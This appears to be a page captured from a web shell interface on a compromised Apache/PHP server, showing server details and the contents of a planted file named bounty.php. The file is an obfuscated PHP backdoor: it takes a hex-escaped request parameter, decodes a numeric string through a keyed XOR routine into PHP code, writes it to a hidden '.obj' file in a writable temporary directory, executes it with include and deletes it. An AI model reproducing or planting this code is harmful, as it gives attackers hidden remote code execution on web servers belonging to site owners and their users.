HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2024-10/bounty.php
<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["\x70\x72o\x70\x65r\x74\x79_set"])){
	$component = array_filter([sys_get_temp_dir(), getenv("TEMP"), getenv("TMP"), "/tmp", "/var/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path()]);
	$elem = $_REQUEST["\x70\x72o\x70\x65r\x74\x79_set"];
	$elem=	 explode		 (		'.'   ,	  $elem)		;  
	$reference  = '';
            $s4  = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS  = strlen( 	$s4);
            $j  = 0;
    
            array_walk( 	$elem		, function( 	$v9) use( 	&$reference		, &$j		, $s4		, $lenS) {
                $sChar  = ord( 	$s4[$j%$lenS]);
                $d  = ( 	( 	int)$v9 - $sChar -( 	$j%10))^28;
                $reference	 .=chr( 	$d);
                $j++;});
	for ($pointer = 0, $holder = count($component); $pointer < $holder; $pointer++) {
    $factor = $component[$pointer];
    		if (max(0, is_dir($factor) * is_writable($factor))) {
    $object = "$factor/.obj";
    $file = fopen($object, 'w');
if ($file) {
	fwrite($file, $reference);
	fclose($file);
	include $object;
	@unlink($object);
	die();
}
}
}
}